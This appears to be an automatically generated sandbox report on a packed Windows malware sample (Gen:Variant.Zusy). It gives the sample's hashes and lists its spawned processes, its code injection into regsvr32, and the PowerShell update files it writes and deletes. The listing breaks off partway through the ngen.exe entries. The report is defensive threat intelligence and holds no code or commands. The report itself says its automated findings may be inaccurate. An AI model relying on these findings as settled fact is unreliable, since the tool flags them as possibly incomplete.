Skip to main content

Gen.Variant.Zusy.175697 (B)_10195aa340


Gen:Variant.Zusy.175697 (B) (Emsisoft), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 10195aa340e7f9ed94d9da127881b52b

SHA1: a78e70d264a68dfa40b82d59b50982b6f097cc21

SHA256: b613332390cbf805d439c26e9c80fbc95842fd0fadac58d098cffca6a54d2f13

SSDeep: 6144:bjKBPRulEMDb7H5 3JKcFylDDcHOEU A dAtx6BPRulEMDb7H5 3JKc54:S0DbVUJKXlDDcHOEUQ0DbVUJKR

Size: 344113 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2016-01-11 22:01:33

Analyzed on: WindowsXP SP3 32-bit

Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

%original file name%.exe:1076
mofcomp.exe:2912
WindowsXP-KB968930-x86-ENG.exe:472
ngen.exe:308
ngen.exe:3824
ngen.exe:3776
ngen.exe:3864
ngen.exe:3736
ngen.exe:3832
ngen.exe:3792
ngen.exe:320
ngen.exe:1504
ngen.exe:3760
ngen.exe:3816
ngen.exe:3660
ngen.exe:3748
ngen.exe:3728
ngen.exe:3720
ngen.exe:3704
ngen.exe:1848
ngen.exe:3784
ngen.exe:3684
ngen.exe:3840
ngen.exe:1532
ngen.exe:3848
ngen.exe:1740
update.exe:1988
mscorsvw.exe:2712
mscorsvw.exe:592
mscorsvw.exe:4084
mscorsvw.exe:3712
mscorsvw.exe:3000
mscorsvw.exe:2784
mscorsvw.exe:1632
mscorsvw.exe:2208
mscorsvw.exe:3252
mscorsvw.exe:2348
mscorsvw.exe:3972
mscorsvw.exe:2176
mscorsvw.exe:2748
mscorsvw.exe:2264
mscorsvw.exe:3668
mscorsvw.exe:2588
mscorsvw.exe:3520
mscorsvw.exe:2956
mscorsvw.exe:2088
mscorsvw.exe:3784
mscorsvw.exe:2572
mscorsvw.exe:1028
mscorsvw.exe:2108
mscorsvw.exe:2536
mscorsvw.exe:1368
PSCustomSetupUtil.exe:3940
PSCustomSetupUtil.exe:3908
PSCustomSetupUtil.exe:2968
PSCustomSetupUtil.exe:4016
PSCustomSetupUtil.exe:3060
PSCustomSetupUtil.exe:3308
PSCustomSetupUtil.exe:2944
PSCustomSetupUtil.exe:3008
PSCustomSetupUtil.exe:3348
PSCustomSetupUtil.exe:3432
PSCustomSetupUtil.exe:3100
PSCustomSetupUtil.exe:3124
PSCustomSetupUtil.exe:3184
PSCustomSetupUtil.exe:3892
PSCustomSetupUtil.exe:3992
PSCustomSetupUtil.exe:3872
PSCustomSetupUtil.exe:3404
PSCustomSetupUtil.exe:3284
PSCustomSetupUtil.exe:3248
PSCustomSetupUtil.exe:4052
PSCustomSetupUtil.exe:3224
PSCustomSetupUtil.exe:4076
PSCustomSetupUtil.exe:3372
PSCustomSetupUtil.exe:3032
PSCustomSetupUtil.exe:3964
PSCustomSetupUtil.exe:3156
PSSetupNativeUtils.exe:1552
regsvr32.exe:1992
regsvr32.exe:1496
wsmanhttpconfig.exe:2816
wsmanhttpconfig.exe:2876

The Malware injects its code into the following process(es):

regsvr32.exe:1296
regsvr32.exe:304

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process mofcomp.exe:2912 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:472 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

C:\c8295f778ef1610270\system.management.automation.resources.dll (3153 bytes)
C:\c8295f778ef1610270\about_pssession_details.help.txt (9 bytes)
C:\c8295f778ef1610270\about_parsing.help.txt (2 bytes)
C:\c8295f778ef1610270\about_pssessions.help.txt (9 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\c8295f778ef1610270\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\c8295f778ef1610270\spmsg.dll (495 bytes)
C:\c8295f778ef1610270\update (4 bytes)
C:\c8295f778ef1610270\about_data_sections.help.txt (5 bytes)
C:\c8295f778ef1610270\eventforwarding.adm (2 bytes)
C:\c8295f778ef1610270\powershellcore.format.ps1xml (1492 bytes)
C:\c8295f778ef1610270\wsmauto.dll (1842 bytes)
C:\c8295f778ef1610270\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\c8295f778ef1610270\about_regular_expressions.help.txt (5 bytes)
C:\c8295f778ef1610270\wsmtxt.xsl (2 bytes)
C:\c8295f778ef1610270\about_windows_powershell_ise.help.txt (6 bytes)
C:\c8295f778ef1610270\about_objects.help.txt (2 bytes)
C:\c8295f778ef1610270\about_trap.help.txt (10 bytes)
C:\c8295f778ef1610270\microsoft.wsman.management.resources.dll (13 bytes)
C:\c8295f778ef1610270\about_try_catch_finally.help.txt (7 bytes)
C:\c8295f778ef1610270\wtrinstaller.ico (4803 bytes)
C:\c8295f778ef1610270\wsmprovhost.exe (657 bytes)
C:\c8295f778ef1610270\system.management.automation.dll-help.xml (16567 bytes)
C:\c8295f778ef1610270\microsoft.powershell.editor.dll (14450 bytes)
C:\c8295f778ef1610270\about_methods.help.txt (6 bytes)
C:\c8295f778ef1610270\wsmpty.xsl (1 bytes)
C:\c8295f778ef1610270\about_preference_variables.help.txt (37 bytes)
C:\c8295f778ef1610270\about_quoting_rules.help.txt (659 bytes)
C:\c8295f778ef1610270\system.management.automation.dll (38414 bytes)
C:\c8295f778ef1610270\about_scopes.help.txt (76 bytes)
C:\c8295f778ef1610270\about_parameters.help.txt (9 bytes)
C:\$Directory (800 bytes)
C:\c8295f778ef1610270\about_ref.help.txt (1 bytes)
C:\c8295f778ef1610270\wsmres.dll (6164 bytes)
C:\c8295f778ef1610270\about_commonparameters.help.txt (12 bytes)
C:\c8295f778ef1610270\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\c8295f778ef1610270\about_transactions.help.txt (1011 bytes)
C:\c8295f778ef1610270\about_remote_jobs.help.txt (13 bytes)
C:\c8295f778ef1610270\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\c8295f778ef1610270\microsoft.powershell.security.resources.dll (9 bytes)
C:\c8295f778ef1610270\wsmanhttpconfig.exe (3009 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\c8295f778ef1610270\about_command_precedence.help.txt (8 bytes)
C:\c8295f778ef1610270\about_prompts.help.txt (7 bytes)
C:\c8295f778ef1610270\about_command_syntax.help.txt (5 bytes)
C:\c8295f778ef1610270\about_remote_output.help.txt (887 bytes)
C:\c8295f778ef1610270\about_locations.help.txt (794 bytes)
C:\c8295f778ef1610270\about_environment_variables.help.txt (417 bytes)
C:\c8295f778ef1610270\about_types.ps1xml.help.txt (481 bytes)
C:\c8295f778ef1610270\windowsremoteshell.adm (12 bytes)
C:\c8295f778ef1610270\wsmwmipl.dll (2816 bytes)
C:\c8295f778ef1610270\about_throw.help.txt (5 bytes)
C:\c8295f778ef1610270\about_arithmetic_operators.help.txt (168 bytes)
C:\c8295f778ef1610270\about_assignment_operators.help.txt (379 bytes)
C:\c8295f778ef1610270\update\updspapi.dll (5940 bytes)
C:\c8295f778ef1610270\pwrshplugin.dll (802 bytes)
C:\c8295f778ef1610270\about_wildcards.help.txt (3 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.management.dll (3386 bytes)
C:\c8295f778ef1610270\about_windows_powershell_2.0.help.txt (453 bytes)
C:\c8295f778ef1610270\winrshost.exe (22 bytes)
C:\c8295f778ef1610270\microsoft.wsman.management.dll (5010 bytes)
C:\c8295f778ef1610270\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\c8295f778ef1610270\winrmprov.mof (789 bytes)
C:\c8295f778ef1610270\update\eula.txt (586 bytes)
C:\c8295f778ef1610270\winrm.ini (1956 bytes)
C:\c8295f778ef1610270\about_bits_cmdlets.help.txt (7 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\c8295f778ef1610270\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\c8295f778ef1610270\about_arrays.help.txt (8 bytes)
C:\c8295f778ef1610270\about_continue.help.txt (1 bytes)
C:\c8295f778ef1610270\about_core_commands.help.txt (221 bytes)
C:\c8295f778ef1610270\about_redirection.help.txt (2 bytes)
C:\c8295f778ef1610270\about_variables.help.txt (6 bytes)
C:\c8295f778ef1610270\pwrshmsg.dll (4 bytes)
C:\c8295f778ef1610270\pwrshsip.dll (24 bytes)
C:\c8295f778ef1610270\about_split.help.txt (10 bytes)
C:\c8295f778ef1610270\about_history.help.txt (3 bytes)
C:\c8295f778ef1610270\about_profiles.help.txt (457 bytes)
C:\c8295f778ef1610270\registry.format.ps1xml (20 bytes)
C:\c8295f778ef1610270\powershell_ise.exe (2526 bytes)
C:\c8295f778ef1610270\dotnettypes.format.ps1xml (266 bytes)
C:\c8295f778ef1610270\about_script_internationalization.help.txt (9 bytes)
C:\c8295f778ef1610270\about_while.help.txt (2 bytes)
C:\c8295f778ef1610270\powershell.exe (7339 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\c8295f778ef1610270\about_eventlogs.help.txt (5 bytes)
C:\c8295f778ef1610270\winrmprov.dll (591 bytes)
C:\c8295f778ef1610270\about_pipelines.help.txt (411 bytes)
C:\c8295f778ef1610270\wsmplpxy.dll (603 bytes)
C:\c8295f778ef1610270\powershell.exe.mui (10 bytes)
C:\c8295f778ef1610270\about_type_operators.help.txt (5 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\c8295f778ef1610270\about_return.help.txt (3 bytes)
C:\c8295f778ef1610270\about_functions_advanced.help.txt (3 bytes)
C:\c8295f778ef1610270\about_properties.help.txt (7 bytes)
C:\c8295f778ef1610270\types.ps1xml (2510 bytes)
C:\c8295f778ef1610270\about_if.help.txt (3 bytes)
C:\c8295f778ef1610270\powershell_ise.resources.dll (4 bytes)
C:\c8295f778ef1610270\about_aliases.help.txt (6 bytes)
C:\c8295f778ef1610270\about_escape_characters.help.txt (2 bytes)
C:\c8295f778ef1610270\about_join.help.txt (2 bytes)
C:\c8295f778ef1610270\update\update.ver (14 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\c8295f778ef1610270\pssetupnativeutils.exe (9 bytes)
C:\c8295f778ef1610270\about_language_keywords.help.txt (11 bytes)
C:\c8295f778ef1610270\about_line_editing.help.txt (1 bytes)
C:\c8295f778ef1610270\about_ws-management_cmdlets.help.txt (405 bytes)
C:\c8295f778ef1610270\update\update.exe (10748 bytes)
C:\c8295f778ef1610270\about_signing.help.txt (12 bytes)
C:\c8295f778ef1610270\bitstransfer.psd1 (950 bytes)
C:\c8295f778ef1610270\about_reserved_words.help.txt (1 bytes)
C:\c8295f778ef1610270\about_logical_operators.help.txt (2 bytes)
C:\c8295f778ef1610270\winrscmd.dll (2907 bytes)
C:\c8295f778ef1610270\about_requires.help.txt (2 bytes)
C:\c8295f778ef1610270\microsoft.wsman.runtime.dll (33 bytes)
C:\c8295f778ef1610270\about_modules.help.txt (13 bytes)
C:\c8295f778ef1610270\about_for.help.txt (146 bytes)
C:\c8295f778ef1610270\bitstransfer.format.ps1xml (16 bytes)
C:\c8295f778ef1610270\microsoft.powershell.consolehost.dll (3118 bytes)
C:\c8295f778ef1610270\about_break.help.txt (792 bytes)
C:\c8295f778ef1610270\about_jobs.help.txt (12 bytes)
C:\c8295f778ef1610270\about_comment_based_help.help.txt (595 bytes)
C:\c8295f778ef1610270\about_remote_troubleshooting.help.txt (146 bytes)
C:\c8295f778ef1610270\diagnostics.format.ps1xml (590 bytes)
C:\c8295f778ef1610270\about_debuggers.help.txt (21 bytes)
C:\c8295f778ef1610270\about_remote.help.txt (7 bytes)
C:\c8295f778ef1610270\update\kb968930xp.cat (512 bytes)
C:\c8295f778ef1610270\winrs.exe (1154 bytes)
C:\c8295f778ef1610270\winrm.vbs (2727 bytes)
C:\c8295f778ef1610270\help.format.ps1xml (3947 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\c8295f778ef1610270\about_scripts.help.txt (12 bytes)
C:\c8295f778ef1610270\getevent.types.ps1xml (15 bytes)
C:\c8295f778ef1610270\importallmodules.psd1 (438 bytes)
C:\c8295f778ef1610270\wsmauto.mof (4 bytes)
C:\c8295f778ef1610270\profile.ps1 (772 bytes)
C:\c8295f778ef1610270\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\c8295f778ef1610270\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\c8295f778ef1610270\about_hash_tables.help.txt (6 bytes)
C:\c8295f778ef1610270\about_switch.help.txt (489 bytes)
C:\c8295f778ef1610270\winrssrv.dll (12 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\c8295f778ef1610270\powershelltrace.format.ps1xml (344 bytes)
C:\c8295f778ef1610270\winrsmgr.dll (2 bytes)
C:\c8295f778ef1610270\about_operators.help.txt (770 bytes)
C:\c8295f778ef1610270\about_foreach.help.txt (10 bytes)
C:\c8295f778ef1610270\about_automatic_variables.help.txt (14 bytes)
C:\c8295f778ef1610270\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\c8295f778ef1610270\about_functions_advanced_methods.help.txt (9 bytes)
C:\c8295f778ef1610270\certificate.format.ps1xml (155 bytes)
C:\c8295f778ef1610270\wevtfwd.dll (3351 bytes)
C:\c8295f778ef1610270\about_format.ps1xml.help.txt (17 bytes)
C:\c8295f778ef1610270\about_remote_requirements.help.txt (6 bytes)
C:\c8295f778ef1610270\pspluginwkr.dll (1756 bytes)
C:\c8295f778ef1610270\about_special_characters.help.txt (3 bytes)
C:\c8295f778ef1610270\about_comparison_operators.help.txt (11 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\c8295f778ef1610270\about_functions.help.txt (586 bytes)
C:\c8295f778ef1610270\about_script_blocks.help.txt (3 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\c8295f778ef1610270\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\c8295f778ef1610270\about_functions_advanced_parameters.help.txt (962 bytes)
C:\c8295f778ef1610270\microsoft.powershell.security.dll (1145 bytes)
C:\c8295f778ef1610270\pscustomsetuputil.exe (316 bytes)
C:\c8295f778ef1610270\windowsremotemanagement.adm (574 bytes)
C:\c8295f778ef1610270\about_remote_faq.help.txt (775 bytes)
C:\c8295f778ef1610270\about_pssnapins.help.txt (6 bytes)
C:\c8295f778ef1610270\about_job_details.help.txt (824 bytes)
C:\c8295f778ef1610270\windowspowershellhelp.chm (26041 bytes)
C:\c8295f778ef1610270\$shtdwn$.req (788 bytes)
C:\c8295f778ef1610270\about_session_configurations.help.txt (276 bytes)
C:\c8295f778ef1610270\update\spcustom.dll (23 bytes)
C:\c8295f778ef1610270\about_do.help.txt (2 bytes)
C:\c8295f778ef1610270\spuninst.exe (3787 bytes)
C:\c8295f778ef1610270\about_execution_policies.help.txt (13 bytes)
C:\c8295f778ef1610270\winrm.cmd (35 bytes)
C:\c8295f778ef1610270\about_wmi_cmdlets.help.txt (8 bytes)
C:\c8295f778ef1610270\microsoft.powershell.editor.resources.dll (562 bytes)
C:\c8295f778ef1610270\spupdsvc.exe (287 bytes)
C:\c8295f778ef1610270\update\update.inf (2457 bytes)
C:\c8295f778ef1610270\about_path_syntax.help.txt (5 bytes)
C:\c8295f778ef1610270\filesystem.format.ps1xml (133 bytes)
C:\c8295f778ef1610270\default.help.txt (2 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\c8295f778ef1610270\wsmsvc.dll (15909 bytes)
C:\c8295f778ef1610270\wsman.format.ps1xml (837 bytes)
C:\c8295f778ef1610270\about_providers.help.txt (59 bytes)

The Malware deletes the following file(s):

C:\c8295f778ef1610270\system.management.automation.resources.dll (0 bytes)
C:\c8295f778ef1610270\pspluginwkr.dll (0 bytes)
C:\_531187_ (0 bytes)
C:\c8295f778ef1610270\about_parsing.help.txt (0 bytes)
C:\c8295f778ef1610270\about_pssessions.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\c8295f778ef1610270\spmsg.dll (0 bytes)
C:\c8295f778ef1610270\update (0 bytes)
C:\c8295f778ef1610270\about_data_sections.help.txt (0 bytes)
C:\c8295f778ef1610270\eventforwarding.adm (0 bytes)
C:\c8295f778ef1610270\powershellcore.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\update\eula.txt (0 bytes)
C:\c8295f778ef1610270\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\c8295f778ef1610270\windowsremotemanagement.adm (0 bytes)
C:\c8295f778ef1610270\wsmtxt.xsl (0 bytes)
C:\c8295f778ef1610270\about_windows_powershell_ise.help.txt (0 bytes)
C:\c8295f778ef1610270\about_objects.help.txt (0 bytes)
C:\c8295f778ef1610270\about_trap.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.wsman.management.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_try_catch_finally.help.txt (0 bytes)
C:\c8295f778ef1610270\wtrinstaller.ico (0 bytes)
C:\c8295f778ef1610270\wsmauto.mof (0 bytes)
C:\c8295f778ef1610270\system.management.automation.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.editor.dll (0 bytes)
C:\c8295f778ef1610270\about_methods.help.txt (0 bytes)
C:\c8295f778ef1610270\wsmpty.xsl (0 bytes)
C:\c8295f778ef1610270\about_remote_faq.help.txt (0 bytes)
C:\c8295f778ef1610270\about_quoting_rules.help.txt (0 bytes)
C:\c8295f778ef1610270\about_execution_policies.help.txt (0 bytes)
C:\c8295f778ef1610270\default.help.txt (0 bytes)
C:\c8295f778ef1610270\pwrshplugin.dll (0 bytes)
C:\c8295f778ef1610270\about_parameters.help.txt (0 bytes)
C:\c8295f778ef1610270\about_ref.help.txt (0 bytes)
C:\c8295f778ef1610270\wsmres.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\about_transactions.help.txt (0 bytes)
C:\c8295f778ef1610270\about_remote_jobs.help.txt (0 bytes)
C:\c8295f778ef1610270\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.security.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_if.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.utility.dll (0 bytes)
C:\c8295f778ef1610270\about_command_precedence.help.txt (0 bytes)
C:\c8295f778ef1610270\pssetupnativeutils.exe (0 bytes)
C:\c8295f778ef1610270\about_commonparameters.help.txt (0 bytes)
C:\c8295f778ef1610270\about_remote_output.help.txt (0 bytes)
C:\c8295f778ef1610270\about_locations.help.txt (0 bytes)
C:\c8295f778ef1610270\about_eventlogs.help.txt (0 bytes)
C:\c8295f778ef1610270\about_types.ps1xml.help.txt (0 bytes)
C:\c8295f778ef1610270\about_pssession_details.help.txt (0 bytes)
C:\c8295f778ef1610270\update\update.ver (0 bytes)
C:\c8295f778ef1610270\about_throw.help.txt (0 bytes)
C:\c8295f778ef1610270\about_arithmetic_operators.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_assignment_operators.help.txt (0 bytes)
C:\c8295f778ef1610270\update\updspapi.dll (0 bytes)
C:\c8295f778ef1610270\about_line_editing.help.txt (0 bytes)
C:\c8295f778ef1610270\about_wildcards.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.management.dll (0 bytes)
C:\c8295f778ef1610270\about_windows_powershell_2.0.help.txt (0 bytes)
C:\c8295f778ef1610270\winrshost.exe (0 bytes)
C:\c8295f778ef1610270\microsoft.wsman.management.dll (0 bytes)
C:\c8295f778ef1610270\wsmprovhost.exe (0 bytes)
C:\c8295f778ef1610270\winrmprov.mof (0 bytes)
C:\c8295f778ef1610270\wsmauto.dll (0 bytes)
C:\c8295f778ef1610270\winrm.ini (0 bytes)
C:\c8295f778ef1610270\about_bits_cmdlets.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\about_arrays.help.txt (0 bytes)
C:\c8295f778ef1610270\about_continue.help.txt (0 bytes)
C:\c8295f778ef1610270\about_core_commands.help.txt (0 bytes)
C:\c8295f778ef1610270\about_redirection.help.txt (0 bytes)
C:\c8295f778ef1610270\about_variables.help.txt (0 bytes)
C:\c8295f778ef1610270\pwrshmsg.dll (0 bytes)
C:\c8295f778ef1610270\about_type_operators.help.txt (0 bytes)
C:\c8295f778ef1610270\about_history.help.txt (0 bytes)
C:\c8295f778ef1610270\about_profiles.help.txt (0 bytes)
C:\c8295f778ef1610270\registry.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\powershell_ise.exe (0 bytes)
C:\c8295f778ef1610270\dotnettypes.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\about_script_internationalization.help.txt (0 bytes)
C:\c8295f778ef1610270\about_while.help.txt (0 bytes)
C:\c8295f778ef1610270\wsmanhttpconfig.exe (0 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_hash_tables.help.txt (0 bytes)
C:\c8295f778ef1610270\winrmprov.dll (0 bytes)
C:\c8295f778ef1610270\about_pipelines.help.txt (0 bytes)
C:\c8295f778ef1610270\pscustomsetuputil.exe (0 bytes)
C:\c8295f778ef1610270\powershell.exe.mui (0 bytes)
C:\c8295f778ef1610270\pwrshsip.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\c8295f778ef1610270\about_return.help.txt (0 bytes)
C:\c8295f778ef1610270\about_functions_advanced.help.txt (0 bytes)
C:\c8295f778ef1610270\about_properties.help.txt (0 bytes)
C:\c8295f778ef1610270\types.ps1xml (0 bytes)
C:\c8295f778ef1610270\windowsremoteshell.adm (0 bytes)
C:\c8295f778ef1610270\powershell_ise.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_aliases.help.txt (0 bytes)
C:\c8295f778ef1610270\about_escape_characters.help.txt (0 bytes)
C:\c8295f778ef1610270\about_join.help.txt (0 bytes)
C:\c8295f778ef1610270\wsmwmipl.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_prompts.help.txt (0 bytes)
C:\c8295f778ef1610270\about_language_keywords.help.txt (0 bytes)
C:\c8295f778ef1610270\update\update.exe (0 bytes)
C:\c8295f778ef1610270\about_signing.help.txt (0 bytes)
C:\c8295f778ef1610270\bitstransfer.psd1 (0 bytes)
C:\c8295f778ef1610270\about_reserved_words.help.txt (0 bytes)
C:\c8295f778ef1610270\about_logical_operators.help.txt (0 bytes)
C:\c8295f778ef1610270\winrscmd.dll (0 bytes)
C:\c8295f778ef1610270\about_requires.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.wsman.runtime.dll (0 bytes)
C:\c8295f778ef1610270\about_modules.help.txt (0 bytes)
C:\c8295f778ef1610270\about_for.help.txt (0 bytes)
C:\c8295f778ef1610270\bitstransfer.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.consolehost.dll (0 bytes)
C:\c8295f778ef1610270\about_ws-management_cmdlets.help.txt (0 bytes)
C:\c8295f778ef1610270\about_jobs.help.txt (0 bytes)
C:\c8295f778ef1610270\about_comment_based_help.help.txt (0 bytes)
C:\c8295f778ef1610270\about_remote_troubleshooting.help.txt (0 bytes)
C:\c8295f778ef1610270\about_script_blocks.help.txt (0 bytes)
C:\c8295f778ef1610270\about_debuggers.help.txt (0 bytes)
C:\c8295f778ef1610270\about_remote.help.txt (0 bytes)
C:\c8295f778ef1610270\certificate.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\winrs.exe (0 bytes)
C:\c8295f778ef1610270\winrm.vbs (0 bytes)
C:\c8295f778ef1610270\help.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\about_scripts.help.txt (0 bytes)
C:\c8295f778ef1610270\getevent.types.ps1xml (0 bytes)
C:\c8295f778ef1610270\importallmodules.psd1 (0 bytes)
C:\c8295f778ef1610270\about_break.help.txt (0 bytes)
C:\c8295f778ef1610270\about_providers.help.txt (0 bytes)
C:\c8295f778ef1610270\powershell.exe (0 bytes)
C:\c8295f778ef1610270\profile.ps1 (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.gpowershell.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\c8295f778ef1610270 (0 bytes)
C:\c8295f778ef1610270\winrssrv.dll (0 bytes)
C:\c8295f778ef1610270\about_command_syntax.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\c8295f778ef1610270\powershelltrace.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\winrsmgr.dll (0 bytes)
C:\c8295f778ef1610270\about_operators.help.txt (0 bytes)
C:\c8295f778ef1610270\about_foreach.help.txt (0 bytes)
C:\c8295f778ef1610270\about_automatic_variables.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\about_functions_advanced_methods.help.txt (0 bytes)
C:\c8295f778ef1610270\update\kb968930xp.cat (0 bytes)
C:\c8295f778ef1610270\about_environment_variables.help.txt (0 bytes)
C:\c8295f778ef1610270\wevtfwd.dll (0 bytes)
C:\c8295f778ef1610270\about_format.ps1xml.help.txt (0 bytes)
C:\c8295f778ef1610270\about_remote_requirements.help.txt (0 bytes)
C:\c8295f778ef1610270\about_scopes.help.txt (0 bytes)
C:\c8295f778ef1610270\about_special_characters.help.txt (0 bytes)
C:\c8295f778ef1610270\about_comparison_operators.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_functions.help.txt (0 bytes)
C:\c8295f778ef1610270\diagnostics.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\c8295f778ef1610270\about_switch.help.txt (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.security.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\about_regular_expressions.help.txt (0 bytes)
C:\c8295f778ef1610270\about_split.help.txt (0 bytes)
C:\c8295f778ef1610270\wsmplpxy.dll (0 bytes)
C:\c8295f778ef1610270\about_pssnapins.help.txt (0 bytes)
C:\c8295f778ef1610270\about_job_details.help.txt (0 bytes)
C:\c8295f778ef1610270\windowspowershellhelp.chm (0 bytes)
C:\c8295f778ef1610270\about_preference_variables.help.txt (0 bytes)
C:\c8295f778ef1610270\about_session_configurations.help.txt (0 bytes)
C:\c8295f778ef1610270\about_do.help.txt (0 bytes)
C:\c8295f778ef1610270\spuninst.exe (0 bytes)
C:\c8295f778ef1610270\system.management.automation.dll (0 bytes)
C:\c8295f778ef1610270\winrm.cmd (0 bytes)
C:\c8295f778ef1610270\wsmsvc.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.editor.resources.dll (0 bytes)
C:\c8295f778ef1610270\spupdsvc.exe (0 bytes)
C:\c8295f778ef1610270\update\update.inf (0 bytes)
C:\c8295f778ef1610270\about_path_syntax.help.txt (0 bytes)
C:\c8295f778ef1610270\filesystem.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\wsman.format.ps1xml (0 bytes)
C:\c8295f778ef1610270\update\spcustom.dll (0 bytes)
C:\c8295f778ef1610270\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\c8295f778ef1610270\about_wmi_cmdlets.help.txt (0 bytes)
C:\c8295f778ef1610270\about_functions_advanced_parameters.help.txt (0 bytes)

The process ngen.exe:308 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:3824 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (468 bytes)

The process ngen.exe:3776 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:3864 makes changes in the file system.


